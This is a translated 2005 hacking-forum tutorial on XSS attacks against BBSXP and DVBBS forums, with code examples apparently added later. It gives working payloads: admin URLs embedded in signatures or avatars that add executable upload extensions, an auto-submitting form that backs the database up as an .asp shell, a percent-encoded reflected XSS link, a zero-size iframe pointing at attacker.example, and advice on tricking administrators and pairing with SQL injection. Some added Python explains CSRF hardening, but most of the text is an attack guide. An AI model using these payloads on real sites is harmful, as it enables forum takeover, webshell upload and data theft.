Source: myhack58, author: Anonymous (佚名), ID: MYHACK58:6220055364
Date: Dec 13, 2005 - 12:00 a.m.

The latest hacking techniques: XSS cross-site scripting attacks explained in detail - vulnerability warning - the black bar safety net


General description
  A simple description of what an XSS attack is
  How to find XSS vulnerabilities
  The general idea of an XSS attack
Attacks from the inside:
  How to find internal XSS vulnerabilities
  How to construct the attack
  How to exploit it
  Combined with real attack instances, such as DVBBS and BBSXP
Attacks from the outside
  How to construct an XSS attack
  How to deceive the administrator into opening it
Combining XSS with other techniques
  Combined with MSSQL injection
  Combined with a QQ cross-site vulnerability
  Cross-site vulnerabilities in large domestic statistics websites
  Social engineering
Making a horror flash Trojan
  Production method, written by Li Fengchu
Summary

Body:
First, XSS general description
What is an XSS attack
XSS, also called CSS (Cross Site Script), is cross-site scripting (the abbreviation XSS is used to avoid confusion with Cascading Style Sheets). It means that an attacker inserts malicious HTML code into a web page; when a user browses that page, the HTML code embedded in it is executed, and the attacker achieves his purpose. XSS is a passive attack, and because it is passive and not easy to exploit, many people tend to dismiss its harm. This article is mainly about using XSS to get a shell on the target server. The technique is old, but I hope the ideas in it help everyone.
How to find XSS vulnerabilities
Personally, I divide XSS attacks into two categories. One is the attack from the inside, which mainly uses the program's own vulnerabilities to construct a cross-site statement, for example the cross-site vulnerability in DVBBS's showerror.asp. The other is the attack from the outside, which mainly means building a page with a cross-site vulnerability ourselves, or finding a page with a cross-site vulnerability on a machine other than the target. For example, when we want to penetrate a site, we construct our own page with a cross-site vulnerability, build the cross-site statement, and combine it with other techniques such as social engineering to trick the target server's administrator into opening it.
Then we use the technique below to get a shell.
How to exploit it
The traditional way of exploiting cross-site scripting is for the attacker to construct a cross-site page, put a cookie-collecting page in some other web space, and then, combined with other techniques, get the user to open the cross-site page so that the user's cookie is stolen for further attacks. I personally think this approach is outdated, and you probably all know its drawbacks: even with the collected cookie you may not be able to go any further, because the password inside most cookies is encrypted, and if you want to replay the cookie you are limited by other conditions as well. This article presents another idea that, to some extent, solves these problems. A more mature approach, in my view, is to construct a form through the cross-site point, where the form's content uses the program's backup function or admin function to obtain high privileges. I describe this technique in detail below.
Second, cross-site attacks from the inside
Looking for cross-site vulnerabilities
If we have the source code things are easier: we mainly look at the places where user input is taken, and whether the variables are checked for length and whether characters such as "<", ">", ";" and "'" are filtered. Also pay attention to whether tags are closed. For example, when testing the QQ group cross-site vulnerability, entering <script>alert('test')</script> in the title does not execute the code, because in the page's source there is an earlier tag that is not closed, such as a missing </script>; once you close it yourself the code runs. So enter </script><script>alert('test')</script> in the title and the test dialog pops up.
How to exploit it
I take BBSXP as the first example; the process has been recorded as an animation, and the details can be seen in the animation on the disc. Here I use two of BBSXP's better cross-site vulnerability points as examples.
a. Register an ordinary user; the user I registered here is linzi. Then, in the personal signature, write:

(the signature content, an image pointing at an admin page, is not preserved in this copy of the article)

c. Then post a message; you can combine this with other techniques to deceive the administrator into browsing the post.
d. Because this is a test, we log in as the administrator ourselves and open the post, and we find that linzi has become a forum moderator, as shown in Figure 1.
In addition, as long as we enter in the personal signature an image whose source is the following URL:
http://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|asp%20|rar

and likewise make a post, then as soon as the administrator opens it, the extension "asp " (asp followed by a space) is added to the allowed upload extensions. Now you only need to upload a newmm.asp (with a trailing space) and you get a shell.
The above attack has some limitations: although you can get a shell, the concealment is not very good, because the signature is limited in length and cannot exceed 255 characters. We can combine it with a flash cross-site to achieve a more covert attack; for making the flash Trojan, see brother Fengchu's introduction below.
The exploitation is as follows:
Modify your profile picture (avatar) URL and enter the following:
admin_setup.asp?menu=variableok&clubname=+&homename=+&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400&UpFileGenre=gif|jpg|php|rar

Then again deceive the administrator into opening your profile or browsing your posts. When the administrator opens it, the php extension is automatically added in the background. Because BBSXP filters spaces and % in the avatar URL, we can only add an extension that contains no space; of course you can also add the shtml extension, with which you can view source code and then attack further.
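The signature and avatar payloads above work for two reasons: admin_setup.asp applies its settings on a plain GET, authenticated by nothing but the admin's session cookie, so any image or iframe the admin's browser loads can trigger it; and Windows drops a trailing space from a file name, so "asp " in the allowed-extension list is really asp. The following Python is an added example, not BBSXP's code or the article's: it parses the article's image URL the way the server's query-string parser would, normalises the extension list the way the file system does, and shows the check a hardened settings handler would perform (POST only, per-session anti-CSRF token compared in constant time, extension allowlist). The function names, the allowlist and the csrf_token field are assumptions of the example.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

# Constructed from the URL in the article's signature image: the admin's
# browser requests it with the admin's session cookie, and admin_setup.asp
# applies the settings on a plain GET with no anti-CSRF token.
IMG_TAG_URL = (
    "http://127.0.0.1/bbsxp/admin_setup.asp?menu=variableok&clubname=+&homename=+"
    "&homeurl=&floor=2&PostTime=3&Timeout=6&OnlineTime=12&Reg10=10&style=1"
    "&selectup=FSO&MaxFace=10240&MaxPhoto=30720&MaxFile=102400"
    "&UpFileGenre=gif|jpg|asp%20|rar"
)

# Assumed allowlist of upload extensions a forum like this actually needs.
SAFE_UPLOAD_EXTENSIONS = {"gif", "jpg", "jpeg", "png", "rar", "zip"}


def request_params(url: str) -> dict:
    """What the server sees in Request.QueryString for a GET of `url`
    (the '+' in clubname=+ becomes a space, %20 becomes a space)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in query.items()}


def normalise_extensions(genre: str) -> list:
    """Split BBSXP's 'gif|jpg|asp |rar' list and normalise each entry the way
    the Windows file system does: trailing spaces and dots are dropped and
    case is ignored. This is why 'newmm.asp ' lands on disk as newmm.asp, and
    why a check must compare the normalised form, never the raw string."""
    out = []
    for ext in genre.split("|"):
        ext = ext.strip(" .").lower()
        if ext:
            out.append(ext)
    return out


def disallowed_extensions(genre: str) -> list:
    """Entries of the list that are not on the allowlist after normalisation."""
    return [e for e in normalise_extensions(genre) if e not in SAFE_UPLOAD_EXTENSIONS]


def authorize_settings_change(method: str, form: dict, session: dict):
    """Hardened policy for an admin settings handler, returning (ok, reason).
    Settings change only on POST, only with the session's anti-CSRF token
    (constant-time compare), and only to extensions on the allowlist."""
    if method.upper() != "POST":
        return False, "state change on GET: an <img>/<iframe> in a post can trigger it"
    token = form.get("csrf_token", "")
    expected = session.get("csrf_token", "")
    if not token or not hmac.compare_digest(token.encode(), expected.encode()):
        return False, "missing or wrong anti-CSRF token"
    bad = disallowed_extensions(form.get("UpFileGenre", ""))
    if bad:
        return False, "disallowed upload extensions: " + ", ".join(bad)
    return True, "ok"


def new_session() -> dict:
    """Session carrying a fresh per-session anti-CSRF token."""
    return {"csrf_token": secrets.token_hex(16)}


if __name__ == "__main__":
    session = new_session()
    params = request_params(IMG_TAG_URL)
    print(repr(params["UpFileGenre"]), disallowed_extensions(params["UpFileGenre"]))
    # 1. the article's attack: GET issued by the admin's browser for the image
    print(authorize_settings_change("GET", params, session))
    # 2. same fields forged as a POST (an auto-submitting form) but without a token
    print(authorize_settings_change("POST", params, session))
    # 3. genuine admin POST with the token, but the 'asp ' entry still present
    print(authorize_settings_change("POST", {**params, "csrf_token": session["csrf_token"]}, session))
    # 4. genuine admin POST with a clean list
    print(authorize_settings_change("POST", {"csrf_token": session["csrf_token"], "UpFileGenre": "gif|jpg|rar"}, session))
```

Note that the token check alone would already defeat the image and iframe tricks, since the attacker cannot read the admin's token; the extension normalisation is the second layer, so that even a legitimate admin cannot be talked into allowing "asp " or "shtml".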
Third, cross-site attacks from the outside
Sometimes we cannot find a usable cross-site point in the target program. In that case we can start from the outside. Take a forum as an example: suppose the forum's own security is done well, but its message board has a cross-site vulnerability. We can then write a cross-site statement in the message board which submits, in the form of an HTML form, the privilege-elevating statement to the forum, like the statement above that adds the asp extension in BBSXP. Of course we can also use the backend backup function to get a shell directly.
Example: first upload a file linzi.txt with the following content:
<body onload="javascript:document.forms[0].submit()"><form
action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post"><input value="database/bbsxp.mdb" name="yl" ><input value="database/shit.asp" name="bf" ></form></body></html>

The above code backs up the forum's database as shit.asp. The message board's cross-site point is the following:
http://127.0.0.1/bbsxp/page2.asp?username=
The backup cross-site statement we construct is as follows:
http://127.0.0.1/bbsxp/page2.asp?username=<body onload%3D"javascript%3Adocument.forms[0].submit()"><form action%3D"http%3A%2F%2F127.0.0.1%2Fbbsxp%2Fadmin_fso.asp%3Fmenu%3Dbakbf" method%3D"post"><input value%3D"database%2Fbbsxp.mdb" name%3D"yl" ><input value%3D"database%2Fshit.asp" name%3D"bf" ><%2Fbody><%2Fhtml>

Or construct a cross-site statement that opens linzi.txt in an iframe of size 0.
When the administrator opens it, the backup runs automatically and we get a shell.
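To see how the percent-encoded link above is derived from the linzi.txt form, here is an added Python example (not the article's code): it encodes the form the way the article does, leaving <, >, quotes, brackets and spaces raw and encoding only the characters a query-string parser would act on (= & ? / :), and then decodes the result with a query-string parser to reproduce what page2.asp echoes into the page. The form, the reflection point and the encoded payload are the article's; the function names, the iframe attributes and the attacker.example host are assumptions of the example.

```python
from urllib.parse import quote, urlsplit, parse_qs

# Constructed copy of the auto-submitting backup form the article places in
# linzi.txt and reflects through page2.asp. The targets (admin_fso.asp?menu=bakbf,
# the yl/bf field names, database/bbsxp.mdb, database/shit.asp) are the
# article's; the code around them is an added example.
BACKUP_FORM = (
    '<body onload="javascript:document.forms[0].submit()">'
    '<form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post">'
    '<input value="database/bbsxp.mdb" name="yl" >'
    '<input value="database/shit.asp" name="bf" >'
    '</body></html>'
)

# The reflection point named in the article: page2.asp echoes ?username= unescaped.
REFLECTION_POINT = "http://127.0.0.1/bbsxp/page2.asp?username="

# The encoded payload exactly as the article prints it after "username=".
ARTICLE_PAYLOAD = (
    '<body onload%3D"javascript%3Adocument.forms[0].submit()">'
    '<form action%3D"http%3A%2F%2F127.0.0.1%2Fbbsxp%2Fadmin_fso.asp%3Fmenu%3Dbakbf"'
    ' method%3D"post"><input value%3D"database%2Fbbsxp.mdb" name%3D"yl" >'
    '<input value%3D"database%2Fshit.asp" name%3D"bf" ><%2Fbody><%2Fhtml>'
)

# Characters the article leaves raw in the query string. Everything else that
# is not unreserved (= & ? / : ...) is percent-encoded so that it survives the
# query-string parser; the server decodes it before echoing, so the browser
# still receives the complete form.
LEFT_RAW = '<>"[]() '


def encode_reflected_payload(html: str) -> str:
    """Percent-encode HTML for the ?username= parameter the way the article does."""
    return quote(html, safe=LEFT_RAW)


def build_attack_url(html: str, reflection_point: str = REFLECTION_POINT) -> str:
    """Full link to hand to the administrator (via a post, an iframe or social engineering)."""
    return reflection_point + encode_reflected_payload(html)


def decode_reflected_payload(url: str) -> str:
    """Reproduce what page2.asp gets from Request.QueryString("username"):
    the query-string parser splits on & and =, then percent-decodes the value.
    Because every = and & inside the form was encoded, the whole form survives
    as a single parameter value."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params["username"][0]


def zero_size_iframe(src: str) -> str:
    """The article's alternative delivery: an invisible iframe that loads the
    auto-submitting page (for example the uploaded linzi.txt)."""
    return f'<iframe src="{src}" width="0" height="0" frameborder="0"></iframe>'


if __name__ == "__main__":
    url = build_attack_url(BACKUP_FORM)
    print(url)
    print(url == REFLECTION_POINT + ARTICLE_PAYLOAD)   # True: matches the article
    print(decode_reflected_payload(url))                # the form page2.asp echoes
    print(zero_size_iframe("http://attacker.example/linzi.txt"))
```

The decode step is the one to keep in mind when testing a reflection point yourself: what matters is what the server-side parameter parser hands back to the page, not what the raw URL looks like, which is why the encoded = and / never reach the browser as %3D and %2F.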
Fourth, combining XSS with other techniques
From the above examples we know that tricking the administrator into opening the page is a very important step. Besides social engineering, we can combine other techniques, such as SQL injection. When we penetrate a website whose main site has an MSSQL injection vulnerability that the public can reach, we use UPDATE to write the cross-site statement into the database, for example an iframe that opens the backup-to-shell cross-site statement above. Similarly, in social engineering we can use QQ and other cross-site vulnerabilities.
Deception is also an art; exactly how to use it is up to your own imagination!
Fifth, Flash Trojan production
(omitted)